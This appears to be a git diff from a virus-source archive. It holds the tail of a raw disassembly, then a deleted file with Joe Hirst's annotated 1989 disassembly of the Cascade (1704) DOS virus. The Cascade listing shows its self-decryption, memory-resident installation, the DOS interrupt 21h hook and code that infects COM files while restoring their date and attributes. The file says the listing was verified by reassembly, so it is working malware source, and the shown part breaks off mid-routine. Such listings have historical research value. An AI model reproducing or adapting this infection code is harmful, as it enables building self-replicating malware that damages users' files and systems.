9Dh, 07h,0FFh - db 80h,0DEh,0DCh, 87h,0E6h, 77h - db 8Bh,0F6h,0DCh -loc_14: - into ; Int 4 on overflow - db 9Bh,0EFh, 63h, 9Bh,0E0h,0ABh - db 0A0h, 9Bh,0E8h, 71h, 8Fh,0FEh - db 0BBh, 86h, 45h, 76h,0B5h,0C2h - db 4Eh, 0Bh, 8Bh, 4Ch, 07h,0E0h - db 45h,0C4h,0E4h,0F6h,0D0h, 7Bh - db 0C4h,0EFh,0EEh,0C4h, 69h,0F0h - db 0E5h,0E2h,0C4h, 4Dh,0EDh,0F2h - db 0D4h, 30h,0F0h,0F2h,0F2h, 43h - db 25h,0D2h, 48h, 43h, 05h,0EAh - db 47h, 80h,0CBh,0A1h, 46h,0A6h - db 7Dh, 2Fh, 3Fh,0CFh,0B5h,0D1h - db 1Dh,0E0h,0F1h,0B5h, 6Fh, 51h - db 20h,0F5h, 79h, 01h - db 4Fh - db 57h,0F4h, 33h, 3Dh, 66h,0C4h -loc_16: - dec bx - dec cx - mov dl,0C0h - lahf ; Load ah from flags - add ax,7EDCh - jns loc_14 ; Jump if not sign - db 0F3h, 7Fh, 61h,0C4h,0E3h, 11h - db 42h,0C8h, 6Eh,0ECh,0D8h,0EEh - db 0BFh, 7Ch, 33h,0D0h - db 7Bh,0E4h, 8Dh, 8Eh,0A4h, 44h - db 80h - db 86h, 82h,0D8h,0A8h, 02h,0FCh - db 0F3h -loc_19: - div byte ptr [bp+di+377Ch] ; al,ah rem = ax/data - lock jmp $-211h -sub_1 endp - - db 6Bh, 51h,0C8h,0E3h, 51h,0EEh - db 0F3h, 4Bh, 53h,0F0h, 0Eh, 01h - db 6Ah,0C8h, 4Fh,0C4h, 42h,0C4h - db 92h - db 9 - db 0E0h, 09h,0F4h,0DEh,0F6h,0F6h - db 0F2h,0DCh, 62h,0E0h,0F4h,0E2h - db 0F8h, 6Bh,0F4h,0FEh,0EDh,0E0h - db 0EDh, 4Ah,0D7h,0D3h, 3Fh,0D3h - db 11h,0BBh, 19h,0B9h, 87h, 07h - db 0CEh, 22h,0E7h,0FCh,0F2h, 46h - db 0DCh, 3Bh,0D3h, 73h, 17h, 2Ah - db 0E5h, 95h, 83h, 92h,0C8h, 63h - db 17h, 52h,0F5h, 87h,0ABh,0E8h - db 4Ah,0DAh,0FBh, 03h,0E3h,0ECh - db 4Fh,0D8h,0F9h,0C3h,0E0h - db 42h - db 0F4h,0CFh,0F7h, 4Eh,0DAh,0D7h - db 54h,0CCh,0E5h,0ECh,0F9h, 2Bh - db 0C3h,0FDh,0C0h, 6Eh,0FCh,0A5h - db 0F7h,0FEh, 19h,0F4h, 1Eh, 0Eh -loc_22: - jl loc_19 ; Jump if < - hlt ; Halt processor - mov dl,6Ah ; 'j' - dec word ptr ds:data_56e[si] - out 1Eh,ax ; port 1Eh ??I/O Non-standard - jc loc_22 ; Jump if carry Set - mov dl,0C0h - dec bp - mov sp,0C8E3h - inc bp - and bl,0C0h - sub sp,si - xchg ax,si - div di ; ax,dx rem=dx:ax/reg - db 0F2h, 4Ah,0D2h,0FBh, 0Fh,0E3h - db 0E8h, 4Fh,0DCh,0F1h,0CFh,0E0h - db 7Eh,0F4h - db 0C3h,0F7h,0ECh, 4Ah,0F2h,0CBh - db 58h, 5Fh,0E0h,0E8h,0FDh, 2Fh - db 0CFh,0F1h, 49h, 24h, 09h, 1Fh - db 65h, 0Ch, 8Eh,0F2h, 49h, 76h - db 16h, 28h,0FDh, 2Ch, 39h, 0Fh - db 4Dh, 58h,0A3h,0D8h, 36h,0F4h - db 0D9h,0EFh, 6Eh, 28h, 29h,0DAh - db 1Dh, 96h, 1Fh,0D2h,0F2h, 87h - db 1Eh, 6Ah,0A2h,0A1h, 9Fh, 9Ch - db 94h, 95h, 93h,0C0h,0DCh,0ECh - db 47h,0D8h,0B5h,0F3h,0D8h, 7Ah - db 0ECh,0BBh,0EFh,0E0h,0E5h, 5Ah - db 0E6h,0DBh, 2Fh,0C3h, 9Ch,0B8h - db 79h, 2Ah, 4Eh,0F6h,0A5h, 3Fh - db 0AFh,0A0h, 0Bh, 94h,0C5h, 87h - db 0ACh, 0Bh, 80h,0CBh,0F3h, 46h - db 0C9h,0F8h,0EDh, 48h,0C0h,0EFh - db 5Bh,0E1h,0E6h, 2Bh,0C3h, 90h - db 0D9h,0D5h, 33h, 87h,0C5h, 4Eh - db 0F0h,0B0h,0FDh, 07h,0F1h, 10h - db 0Bh,0E7h,0ECh, 61h, 85h - db 0CFh,0DCh, 7Bh,0E0h,0BBh,0F3h - db 46h,0D0h, 23h,0C3h,0CCh, 67h - db 0D8h,0CCh,0E3h,0A3h,0B4h, 87h - db 0F1h, 1Fh, 31h,0F2h,0DCh, 8Dh - db 37h, 48h, 04h, 01h, 76h, 0Ch - db 2Bh, 88h, 37h,0BEh,0F3h,0CDh - db 0Fh, 84h,0F1h, 07h, 5Dh,0E2h - db 0CCh, 66h,0D8h,0CCh,0E3h, 07h - db 9Bh,0FCh,0DCh - db 57h -loc_27: - mov bp,0F7F3h - xchg ax,di - aaa ; Ascii adjust - in al,dx ; port 0FEC0h ??I/O Non-standard - stc ; Set carry flag - db 0C0h,0E9h - db 0C3h,0B6h, 29h, 76h,0F2h,0B1h - db 0D8h, 33h,0E4h,0B5h,0EFh, 23h - db 0C3h, 90h, 3Dh,0C8h, 6Bh,0ECh - db 0AFh,0EFh, 72h, 03h,0D6h, 00h - db 33h,0D5h,0FAh, 87h, 3Ah, 83h - db 0C5h,0B5h, 4Bh, 4Fh,0AFh - db 0FCh, 37h, 4Ah,0F4h - db 0CBh, 3Fh,0D3h, 9Ch, 50h, 69h - db 3Ah, 5Eh,0E4h,0A0h,0D1h, 27h - db 0DDh, 20h, 3Fh,0D7h, 1Eh,0A2h - db 0F1h,0BDh,0D6h, 7Ah,0C2h, 84h - db 0E8h, 49h,0CCh, 83h,0CFh,0DCh - db 79h,0E0h,0BDh,0F3h, 3Fh,0CFh - db 5Ah,0A2h,0D1h, 2Fh, 2Bh,0C3h - db 09h,0CFh, 7Eh - db 4Ah,0F2h,0B4h,0C5h, 3Bh,0C1h - db 0DCh,0C3h, 23h, 70h, 13h, 28h - db 0A3h, 49h, 0Fh, 0Bh, 0Ch, 0Dh - db 0D8h, 55h,0A2h,0F3h, 5Ah,0AEh - db 58h,0ADh,0E7h, 5Fh,0E1h,0E2h - db 23h,0CFh, 4Ah,0F3h,0A1h,0D8h - db 79h,0E4h, 8Dh,0CFh,0ECh, 49h - db 0C8h, 83h,0C3h, 0Fh,0EFh, 7Ah - db 0CCh, 3Fh,0D7h,0D8h, 79h,0FCh - db 0AFh,0EFh, 14h, 23h,0E1h, 93h - db 0E7h, 14h, 2Fh,0CEh, 87h,0F8h - db 4Eh,0F7h,0B1h,0DCh, 4Bh, 98h - db 0C5h, 83h, 4Bh,0A7h, 9Dh, 85h - db 0D3h,0D1h,0ACh,0A8h,0AFh,0ADh - db 0AAh, 6Fh, 07h, 5Ch, 1Ch,0FCh - db 0E8h -loc_33: - stc ; Set carry flag - mov cl,0B3h - mov sp,4BBEh - cmc ; Complement carry - db 0F6h, 4Dh, 86h,0F3h, 31h,0F9h - db 49h, 85h, 38h,0D7h,0C5h, 89h - db 85h - db 2Ch, 05h,0AAh,0E7h,0F1h, 79h - db 0E5h,0B6h,0E5h, 22h, 96h,0E4h - db 11h, 00h, 69h, 2Ch,0B4h,0ABh - db 0A9h,0E9h, 35h,0ECh,0F4h, 58h - db 58h, 52h, 0Dh, 00h,0BEh, 43h - db 03h, 81h,0D6h, 4Ch, 94h,0F7h - db 48h, 9Eh,0F2h, 57h,0E6h,0E2h - db 1Eh, 15h, 43h,0BBh,0BDh,0B0h - db 0E9h,0EDh, 31h,0A0h,0E8h,0A0h - db 78h, 08h, 38h,0E4h, 90h,0C7h - db 70h,0C2h,0C1h - db 0Ch - db 1Fh, 12h,0F1h,0F0h,0ACh,0F3h - db 79h, 1Eh, 18h,0E4h,0B6h,0E7h - db 19h, 6Ch,0FCh,0B6h,0EFh, 86h - db 0E0h, 4Ch, 2Ch,0F1h, 08h, 62h - db 26h, 8Ah,0F7h, 8Fh, 2Eh, 83h - db 0F7h, 79h, 62h, 5Ah,0F3h, 82h - db 0Dh, 5Fh - db 09h,0B4h,0F1h,0BCh, 21h,0B1h - db 0E0h,0B0h,0B1h, 65h, 36h, 78h - db 34h, 00h,0D0h,0A0h,0F3h, 78h - db 0CEh,0C1h, 00h, 17h, 26h,0C1h - db 0C4h, 94h,0CFh, 79h, 0Ah, 00h - db 0F0h,0A6h,0F3h, 11h, 60h,0E4h - db 0BAh,0E7h, 92h,0F0h, 58h, 34h - db 0EDh, 08h, 1Eh, 5Eh,0FEh, 87h - db 0FBh,0A6h, 0Fh, 77h,0F5h,0EAh - db 0AEh, 03h, 76h,0F5h, 85h, 31h - db 58h, 0Dh,0ADh,0A8h,0F5h,0B1h - db 2Dh,0B3h,0B3h, 6Dh,0E8h,0BEh - db 0E3h, 0Ch, 10h,0ABh, 10h, 00h - db 0AFh, 31h,0A2h, 2Ah,0AFh,0F6h - db 0C0h,0E2h, 38h, 24h,0A3h, 96h - db 0Dh,0CEh,0F2h, 82h,0FCh,0CEh - db 0D2h, 9Ah,0E8h,0DEh, 1Dh, 92h - db 0E4h, 1Ah, 21h, 17h, 2Dh,0CEh - db 42h, 84h,0F0h,0CEh, 2Dh,0F9h - db 8Ch, 7Bh, 41h, 7Eh, 45h, 9Ch - db 3Ah,0CEh, 8Eh, 7Ch, 2Ah, 0Dh - db 57h, 9Eh,0F2h,0D5h,0E8h, 8Eh - db 0E2h, 92h, 1Ch,0D1h -loc_37: - sub cx,[bx-7Eh] - db 0F2h,0B3h, 82h,0E3h,0C9h,0F4h - db 0A2h,0CEh,0B6h, 35h,0D9h, 4Dh - db 03h,0F1h, 1Ch, 77h,0FDh,0F2h - db 01h, 07h,0DCh, 51h,0B2h,0EFh - db 21h,0ABh - db 0Dh, 08h - db 24h,0E4h - db 0BDh,0EFh,0EAh,0ECh, 4Eh,0B6h - db 0F2h, 7Ch,0D6h,0ACh, 4Fh, 01h - db 1Ah,0A6h, 5Bh, 00h,0BFh,0F2h - db 49h,0C2h,0E7h, 41h,0F2h,0F4h - db 0BBh, 23h,0F2h,0BFh,0E1h, 66h - db 18h, 1Dh, 9Ah,0EAh, 7Ah,0E4h - db 0A5h,0F7h, 46h,0FDh, 03h,0DEh - db 4Ah,0E4h, 94h,0C7h, 04h,0C4h - db 9Ah,0CFh,0F2h, 35h,0F0h,0AEh - db 0F3h,0F2h, 5Eh,0D2h,0E5h, 96h - db 0D0h, 94h - db 0E1h, 0Bh, 0Eh,0EEh, 35h,0F4h - db 0AEh,0F7h,0F2h, 4Ah,0B2h, 8Dh - db 0F5h - -locloop_40: - movsw ; Mov [si] to es:[di] -;* mov dx,offset loc_46 ;* - db 0BAh, 84h,0F0h - mov ax,ds:data_45e - cmpsb ; Cmp [si] to es:[di] - db 0F3h,0F7h, 56h,0A1h,0F3h, 10h - db 2Eh, 14h,0C4h,0B4h,0E7h, 41h - db 80h,0EFh, 4Fh, 96h,0F3h,0CDh - db 0F0h, 90h,0F3h,0B8h,0CDh, 63h - db 0A0h,0C7h, 2Eh,0A9h, 3Ch, 8Eh - db 45h, 02h,0C1h, 09h,0B1h, 53h - db 90h,0EFh, 3Fh, 02h,0D9h, 1Eh - db 90h,0E1h, 0Bh, 4Eh,0EEh, 72h - db 0FCh,0A1h,0F7h,0F0h, 52h, 5Ch - db 0Fh,0B6h, 02h,0EEh, 4Ah,0FCh - db 88h,0DEh,0AEh,0A1h,0F3h, 42h - db 0F6h, 1Ah,0B0h, 10h, 64h, 12h - db 0Ah, 60h, 18h, 0Ah,0F3h, 11h - db 9Ch, 20h, 1Ah,0EAh, 09h, 80h - db 3Fh, 6Ch, 9Bh,0C3h, 4Ah,0E0h - db 90h,0C3h, 48h,0C0h, 9Dh,0F3h - db 47h,0F6h, 08h, 34h,0C8h,0D8h - db 0BDh,0E3h, 95h,0B4h, 0Eh, 86h - db 1Ch,0D4h,0C8h,0A4h,0F3h, 83h - db 0BFh, 1Ah, 1Bh, 70h,0FCh,0AAh - db 6Ah, 72h, 78h,0F0h,0BDh, 70h - db 48h,0C8h,0C4h,0A5h,0F7h, 85h - db 0C5h, 06h,0A7h, 1Ch,0D8h,0C0h - db 0B0h,0E3h, 97h,0C0h, 06h, 3Ch - db 0Ch, 85h, 13h, 1Ah, 4Ch, 30h - db 30h, 0Ch, 2Ah,0F0h, 38h, 60h - db 97h,0CFh, 30h, 34h, 72h,0D0h - db 0A1h,0F3h, 0Fh, 10h, 20h, 52h - db 0C2h, 0Eh,0BBh, 1Ch, 1Ch, 28h - db 4Eh,0A7h,0F3h, 1Eh,0A3h, 0Ch - db 11h, 0Ah,0E7h, 8Dh,0FDh, 4Eh - db 0ECh,0A5h,0F5h, 09h, 58h,0F2h - db 0F0h, 82h,0F5h, 1Bh,0AEh, 11h - db 06h, 69h, 1Ch,0A8h, 92h,0E1h - db 0Bh,0BFh, 11h, 16h, 93h,0D2h - db 0Ah, 14h, 93h, 0Dh,0E0h, 34h - db 0C4h, 91h,0C7h,0CBh,0B7h, 96h - db 0E0h, 72h,0FCh,0A1h,0F7h,0F3h - db 0DCh, 11h,0E0h,0BCh,0E3h, 93h - db 0A3h,0FCh - -locloop_41: - in al,0E0h ; port 0E0h, Memory encode reg2 - db 0F1h,0FCh,0F5h,0A6h,0A5h,0A3h - db 0A0h,0D8h,0D9h,0D7h, 32h,0A6h - db 60h,0A2h, 23h,0EEh, 8Fh,0CFh - db 0CAh,0F2h, 85h,0F1h, 4Ah,0D6h - db 0EAh, 0Ah, 9Ch, 1Bh,0A6h, 41h - db 0BCh,0EFh, 4Dh, 92h,0F3h, 1Eh - db 61h, 0Ch, 4Ah,0CDh,0CEh, 2Ah - db 0ACh, 3Bh, 86h, 35h,0E4h,0AAh - db 0CFh, 81h,0F1h, 4Eh, 09h, 0Dh - db 51h, 8Ah,0EFh,0BFh,0BDh,0B8h - db 0BCh,0BBh,0B9h,0B6h,0E9h,0EDh - db 0DCh, 76h,0D0h,0A5h,0F3h,0F0h - db 20h,0FDh, 2Ch, 35h, 07h, 2Ch - db 0F4h, 08h, 59h,0F3h,0FAh, 82h - db 0EBh,0A2h,0A3h,0BCh, 5Ah,0C8h - db 2Fh,0C7h, 67h, 1Bh, 26h,0E9h - db 9Ch,0FFh, 85h,0F3h - -locloop_42: - jbe loc_45 ; Jump if below or = - clc ; Clear carry flag - mov sp,0ECC8h - inc dx - loopnz locloop_41 ; Loop if zf=0, cx>0 - - retn - db 35h, 94h - db 97h - db 0AAh -loc_45: - esc 4,[bx+di] ; coprocessor escape - esc 0,cl ; coprocessor escape - db 0F3h,0E8h,0BDh, 56h,0AAh, 5Dh - db 8Dh,0E2h, 2Fh,0CFh,0B5h, 81h - db 0F1h, 0Fh,0F1h, 31h,0DCh, 48h - db 88h, 82h, 83h, 87h, 08h, 42h - db 8Ch, 91h,0BDh, 0Dh, 4Ch,0F6h - db 0F7h, 4Bh, 57h,0E8h, 12h, 11h - db 46h, 59h,0C5h,0E2h, 5Ch,0CDh - db 0EFh,0F1h,0C4h,0BDh,0F7h, 4Bh - db 70h,0C8h,0E8h,0F3h,0F7h,0E0h - db 0F7h,0CFh, 85h, 88h, 2Ch, 04h - db 7Ch, 2Eh, 42h,0B2h,0C1h, 3Ch - db 57h, 47h,0E4h, 2Bh,0C7h, 7Eh - db 0B2h, 5Ah,0A7h, 3Fh,0D3h,0AEh - db 6Bh,0FCh,0EDh, 7Ch,0BBh, 36h - db 0CCh, 7Ch,0BFh, 0Ah,0F5h,0C2h - -seg_a ends - - - - end start diff --git a/0-9/1704 (5).ASM b/0-9/1704 (5).ASM deleted file mode 100755 index 0f93af6..0000000 --- a/0-9/1704 (5).ASM +++ /dev/null @@ -1,919 +0,0 @@ - page 65,132 - title The 'Cascade' Virus (1704 version) -; ͻ -; British Computer Virus Research Centre -; 12 Guildford Street, Brighton, East Sussex, BN1 3LS, England -; Telephone: Domestic 0273-26105, International +44-273-26105 -; -; The 'Cascade' Virus (1704 version) -; Disassembled by Joe Hirst, March 1989 -; -; Copyright (c) Joe Hirst 1989. -; -; This listing is only to be made available to virus researchers -; or software writers on a need-to-know basis. -; ͼ - - ; The virus occurs attached to the end of a COM file. The first - ; three bytes of the program are stored in the virus, and replaced - ; by a branch to the beginning of the virus. - - ; The disassembly has been tested by re-assembly using MASM 5.0. - -RAM SEGMENT AT 400H - - ; System data - - ORG 4EH -BW044E DW ? ; VDU display start address - - ORG 6CH -BW046C DW ? ; System clock - -RAM ENDS - -MCB SEGMENT AT 0 ; Memory control block references - -MB0000 DB ? ; MCB signature -MW0001 DW ? ; MCB owner -MW0003 DW ? ; MCB size - -MCB ENDS - -OPROG SEGMENT AT 0 ; Original program references - - ORG 100H -OW0100 DW ? -OB0102 DB ? - -OPROG ENDS - -CODE SEGMENT BYTE PUBLIC 'CODE' - ASSUME CS:CODE,DS:OPROG - -VIRLEN EQU OFFSET ENDADR-START -MAXLEN EQU OFFSET START-ENDADR-20H -JMPADR = OFFSET START-ENDADR-2 - - ORG 16H -DW0016 DW ? ; PSP parent ID - - ORG 2CH -DW002C DW ? ; PSP environment - - ORG 36H -DW0036 DW ? ; FHT segment - - ORG 100H - -START: - -DB0100 DB 1 ; Encryption indicator - - ; Virus entry point - -ENTRY: CLI - MOV BP,SP ; Save stack pointer - CALL BP0010 ; \ Get address of BP0010 -BP0010: POP BX ; / - SUB BX,OFFSET BP0010+2AH ; Standardise relocation reg - TEST DB0100[BX+2AH],1 ; Is virus encrypted - JZ BP0030 ; Branch if not - LEA SI,BP0030[BX+2AH] ; Address start of encrypted area - MOV SP,OFFSET ENDADR-BP0030 ; Length of encrypted area -BP0020: XOR [SI],SI ; \ Decrypt - XOR [SI],SP ; / - INC SI ; \ Next address - DEC SP ; / - JNZ BP0020 ; Repeat for all area -BP0030: MOV SP,BP ; Restore stack pointer - JMP BP0040 ; Branch past data - - ; Data - -PROGRM EQU THIS DWORD -PRG_OF DW 100H ; Original program offset -PRG_SGIDW 1021H ; Original program segment - -INITAX DW 0 ; Initial AX value -PROG_1 DW 2DE9H ; \ First three bytes of program -PROG_2 DB 0DH ; / - DB 0, 0 - -I1CBIO EQU THIS DWORD -I1C_OF DW 0FF53H ; Interrupt 1CH offset -I1C_SG DW 0F000H ; Interrupt 1CH segment - -I21BIO EQU THIS DWORD -I21_OF DW 1460H ; Interrupt 21H offset -I21_SG DW 026AH ; Interrupt 21H segment - -I28BIO EQU THIS DWORD -I28_OF DW 1445H ; Interrupt 28H offset -I28_SG DW 0270H ; Interrupt 28H segment - - DW 0 ; - not referenced -F_ATTR DW 0 ; File attributes -F_DATE DW 0E71H ; File date -F_TIME DW 601FH ; File time -F_PATH EQU THIS DWORD -PATHOF DW 044EH ; File pathname offset -PATHSG DW 20FFH ; File pathname segment -F_SIZ1 DW 62DBH ; File size - low word -F_SIZ2 DW 0 ; File size - high word -JUMP_1 DB 0E9H ; \ Jump instruction -JUMP_2 DW 1D64H ; / -NUMCOL DB 0 ; Number of display columns -NUMROW DB 0 ; Number of display rows -C80_SW DB 0 ; 80 column text switch -CURCHA DB 0 ; Current character -CURATT DB 0 ; Current attributes -SWITCH DB 8 ; Switches - ; 01 Int 1CH active - ; 02 Switch 2 - ; 04 Switch 3 - not used - ; 08 No display -RAM_SG DW 0 ; Video RAM segment -VDURAM DW 0 ; VDU display start address -LOOPCT DW 04F8H ; Timed loop count -I1CCNT DW 0FDAH ; Int 1CH count -I1CMAX DW 0FDAH ; Int 1CH random number maximum -NUMPOS DW 0 ; Number of display positions -RANPOS DW 1 ; Number of lines to affect -RANDOM DW 8FB2H, 0AH, 0, 0, 100H, 0, 1414H, 14H - - ; Main program start - -BP0040: CALL BP0050 ; \ Get address of BP0050 -BP0050: POP BX ; / - SUB BX,OFFSET BP0050+2AH ; Standardise relocation reg - MOV PRG_SG[BX+2AH],CS ; Save original program segment - MOV INITAX[BX+2AH],AX ; Save initial AX value - MOV AX,PROG_1[BX+2AH] ; Get first 2 bytes of program - MOV OW0100,AX ; Replace them - MOV AL,PROG_2[BX+2AH] ; Get third byte of program - MOV OB0102,AL ; Replace it - PUSH BX - MOV AH,30H ; Get DOS version number function - INT 21H ; DOS service - POP BX - CMP AL,2 ; Version 2.X or above? - JB BP0060 ; Branch if not - MOV AX,4BFFH ; Is virus active function - XOR DI,DI ; Clear register - XOR SI,SI ; Clear register - INT 21H ; DOS service - CMP DI,55AAH ; Is virus already active - JNE BP0070 ; Branch if not -BP0060: STI - PUSH DS ; \ Set ES to DS - POP ES ; / - MOV AX,INITAX[BX+2AH] ; Restore initial AX value - JMP PROGRM[BX+2AH] ; Branch to original program - -BP0070: PUSH BX - MOV AX,3521H ; Get interrupt 21H function - INT 21H ; DOS service - MOV AX,BX ; Move interrupt 21H offset - POP BX - MOV I21_OF[BX+2AH],AX ; Save interrupt 21H offset - MOV I21_SG[BX+2AH],ES ; Save interrupt 21H segment - MOV AX,0F000H ; \ - MOV ES,AX ; ) Address BIOS - MOV DI,0E008H ; / - CMP WORD PTR ES:[DI],'OC' ; \ Branch if not IBM BIOS - JNE BP0080 ; / - CMP WORD PTR ES:[DI+2],'RP' ; \ Branch if not IBM BIOS - JNE BP0080 ; / - CMP WORD PTR ES:[DI+4],' .' ; \ Branch if not IBM BIOS - JNE BP0080 ; / - CMP WORD PTR ES:[DI+6],'BI' ; \ Branch if not IBM BIOS - JNE BP0080 ; / - CMP WORD PTR ES:[DI+8],'M' ; \ IBM BIOS - JE BP0060 ; / - - ; Install virus - - ASSUME ES:MCB,DS:NOTHING -BP0080: MOV AX,007BH ; Load size of virus in paragraphs - MOV BP,CS ; Get current segment - DEC BP ; \ Address back to MCB - MOV ES,BP ; / - MOV SI,DW0016 ; Get parent ID - MOV MW0001,SI ; Store as owner in MCB - MOV DX,MW0003 ; Get MCB size - MOV MW0003,AX ; Store virus size - MOV MB0000,4DH ; Store MCB identification - SUB DX,AX ; Subtract virus from original size - DEC DX ; - INC BP ; Forward from MCB - ADD BP,AX ; Add size of virus - INC BP ; And of another MCB - MOV ES,BP ; Address new PSP segment - PUSH BX - MOV AH,50H ; Set current PSP function - MOV BX,BP ; New PSP segment - INT 21H ; DOS service - POP BX - XOR DI,DI ; Clear register - PUSH ES ; \ Set stack segment to new PSP - POP SS ; / - PUSH DI - LEA DI,CPY040[BX+2AH] ; Address end of virus - MOV SI,DI ; And for source - MOV CX,VIRLEN ; Get length of virus - STD ; Going downwards - REPZ MOVSB ; Copy virus - PUSH ES ; Push new segment - LEA CX,BP0090[BX+2AH] ; \ And next instruction - PUSH CX ; / - RETF ; ... and load them - - ; Now running in virus at end of new program segment - -BP0090: MOV PRG_SG[BX+2AH],CS ; New segment in program address - LEA CX,DB0100[BX+2AH] ; Get length of original program - REPZ MOVSB ; Copy original program to new PSP - MOV DW0036,CS ; New segment in handle table address - DEC BP ; \ Address back to MCB - MOV ES,BP ; / - MOV MW0003,DX ; Store original program size - MOV MB0000,5AH ; Store MCB ident (last) - MOV MW0001,CS ; Store CS as owner in MCB - INC BP ; \ Forward again to PSP - MOV ES,BP ; / - PUSH DS ; \ Set ES to DS - POP ES ; / - PUSH CS ; \ Set DS to CS - POP DS ; / - LEA SI,DB0100[BX+2AH] ; Address start of virus - MOV DI,OFFSET DB0100 ; Start of program area in first area - MOV CX,VIRLEN ; Get length of virus - CLD ; Copy forwards - REPZ MOVSB ; Copy virus to start of first area - PUSH ES ; Push segment of first area - LEA AX,BP0100 ; \ Offset of next instruction - PUSH AX ; / - RETF ; ... and load them - - ; Now running in installed virus, first area - - ASSUME ES:NOTHING -BP0100: MOV DW002C,0 ; No environment pointer - MOV DW0016,CS ; Is its own parent - PUSH DS - LEA DX,INT_21 ; Interrupt 21H routine - PUSH CS ; \ Set DS to CS - POP DS ; / - MOV AX,2521H ; Set interrupt 21H function - INT 21H ; DOS service - POP DS - MOV AH,1AH ; Set DTA function - MOV DX,0080H ; DTA address - INT 21H ; DOS service - CALL GETCLK ; Copy system clock - MOV AH,2AH ; Get date function - INT 21H ; DOS service - CMP CX,07C4H ; Year 1988? - JA BP0130 ; Branch if after 1988 - JE BP0110 ; Branch if 1988 - CMP CX,07BCH ; Year 1980? - JNE BP0130 ; Branch if not - PUSH DS - MOV AX,3528H ; Get interrupt 28H function - INT 21H ; DOS service - MOV I28_OF,BX ; Save interrupt 28H offset - MOV I28_SG,ES ; Save interrupt 28H segment - MOV AX,2528H ; Set interrupt 28H function - MOV DX,OFFSET INT_28 ; Int 28H routine address - PUSH CS ; \ Set DS to CS - POP DS ; / - INT 21H ; DOS service - POP DS - OR SWITCH,8 ; Set on No display switch - JMP BP0120 - - ; Year is 1988 - -BP0110: CMP DH,0AH ; October? - JB BP0130 ; Branch if not -BP0120: CALL TIMCYC ; Time one clock cycle - MOV AX,1518H ; Upper limit - 5400 - CALL RNDNUM ; Create random number - INC AX ; Add to random number - MOV I1CCNT,AX ; Set Int 1CH count - MOV I1CMAX,AX ; Set Int 1CH random no maximum - MOV RANPOS,1 ; Set num of lines to affect to 1 - MOV AX,351CH ; Get interrupt 1CH function - INT 21H ; DOS service - MOV I1C_OF,BX ; Save interrupt 1CH offset - MOV I1C_SG,ES ; Save interrupt 1CH segment - PUSH DS - MOV AX,251CH ; Set interrupt 1CH function - MOV DX,OFFSET INT_1C ; Int 1CH routine address - PUSH CS ; \ Set DS to CS - POP DS ; / - INT 21H ; DOS service - POP DS -BP0130: MOV BX,-2AH ; Set up relocation register - JMP BP0060 ; Branch to start program - - ; Interrupt 21H routine - -INT_21: CMP AH,4BH ; Load function? - JE I_2106 ; Branch if yes -I_2102: JMP I21BIO ; Branch to original int 21H - - ; Virus call - -I_2104: MOV DI,55AAH ; Virus call - signal back - LES AX,I21BIO ; Load return address - MOV DX,CS ; Load segment - IRET - - ; Load and execute function - -I_2106: CMP AL,0FFH ; Is this a virus call? - JE I_2104 ; Branch if yes - CMP AL,0 ; Load and execute? - JNE I_2102 ; Branch if not - PUSHF - PUSH AX - PUSH BX - PUSH CX - PUSH DX - PUSH SI - PUSH DI - PUSH BP - PUSH ES - PUSH DS - MOV PATHOF,DX ; Save pathname offset - MOV PATHSG,DS ; Save pathname segment - PUSH CS ; \ Set ES to CS - POP ES ; / - MOV AX,3D00H ; Open handle function - INT 21H ; DOS service - JB I_2110 ; Branch if error - MOV BX,AX ; Move file handle - MOV AX,5700H ; Get file date and time function - INT 21H ; DOS service - MOV F_DATE,DX ; Save file date - MOV F_TIME,CX ; Save file time - MOV AH,3FH ; Read handle function - PUSH CS ; \ Set DS to CS - POP DS ; / - MOV DX,OFFSET PROG_1 ; \ First three bytes of program - MOV CX,3 ; / - INT 21H ; DOS service - JB I_2110 ; Branch if error - CMP AX,CX ; Correct length read? - JNE I_2110 ; Branch if error - MOV AX,4202H ; Move file pointer (EOF) function - XOR CX,CX ; \ No displacement - XOR DX,DX ; / - INT 21H ; DOS service - MOV F_SIZ1,AX ; File size - low word - MOV F_SIZ2,DX ; File size - high word - MOV AH,3EH ; Close handle function - INT 21H ; DOS service - CMP PROG_1,5A4DH ; Is it an EXE file? - JNE I_2108 ; Branch if not - JMP I_2124 ; Dont infect - -I_2108: CMP F_SIZ2,0 ; File size - high word - JA I_2110 ; Branch if file too big - CMP F_SIZ1,MAXLEN ; Maximum file size? - JBE I_2112 ; Branch if file not too big -I_2110: JMP I_2124 ; Dont infect - -I_2112: CMP BYTE PTR PROG_1,0E9H ; Does program start with a branch - JNE I_2114 ; Branch if not - MOV AX,F_SIZ1 ; Get file size - low word - ADD AX,WORD PTR JMPADR ; Convert to infected offset - CMP AX,PROG_1+1 ; Is it the same - JE I_2110 ; Branch if already infected -I_2114: MOV AX,4300H ; Get file attributes function - LDS DX,F_PATH ; Pathname pointer - INT 21H ; DOS service - JB I_2110 ; Branch if error - MOV F_ATTR,CX ; Save file attributes - XOR CL,20H ; Change archive bit - TEST CL,27H ; Are there any attributes to change - JZ I_2116 ; Branch if not - MOV AX,4301H ; Set file attributes function - XOR CX,CX ; No attributes - INT 21H ; DOS service - JB I_2110 ; Branch if error -I_2116: MOV AX,3D02H ; Open handle (R/W) function - INT 21H ; DOS service - JB I_2110 ; Branch if error - MOV BX,AX ; Move file handle - MOV AX,4202H ; Move file pointer (EOF) function - XOR CX,CX ; \ No displacement - XOR DX,DX ; / - INT 21H ; DOS service - CALL CPYVIR ; Copy virus to program - JNB I_2118 ; Branch if no error - MOV AX,4200H ; Move file pointer (Start) function - MOV CX,F_SIZ2 ; File size - high word - MOV DX,F_SIZ1 ; File size - low word - INT 21H ; DOS service - MOV AH,40H ; Write handle function - XOR CX,CX ; Zero length (reset length} - INT 21H ; DOS service - JMP I_2120 ; Reset file details - -I_2118: MOV AX,4200H ; Move file pointer (Start) function - XOR CX,CX ; \ No displacement - XOR DX,DX ; / - INT 21H ; DOS service - JB I_2120 ; Branch if error - MOV AX,F_SIZ1 ; Get file size - low word - ADD AX,0FFFEH ; Convert to jump offset - MOV JUMP_2,AX ; Store in jump instruction - MOV AH,40H ; Write handle function - MOV DX,OFFSET JUMP_1 ; Address to jump instruction - MOV CX,3 ; Length of jump instruction - INT 21H ; DOS service -I_2120: MOV AX,5701H ; Set file date and time function - MOV DX,F_DATE ; Get old file date - MOV CX,F_TIME ; Get old file time - INT 21H ; DOS service - MOV AH,3EH ; Close handle function - INT 21H ; DOS service - MOV CX,F_ATTR ; Get old file attributes - TEST CL,7 ; System, read only or hidden? - JNZ I_2122 ; Branch if yes - TEST CL,20H ; Archive? - JNZ I_2124 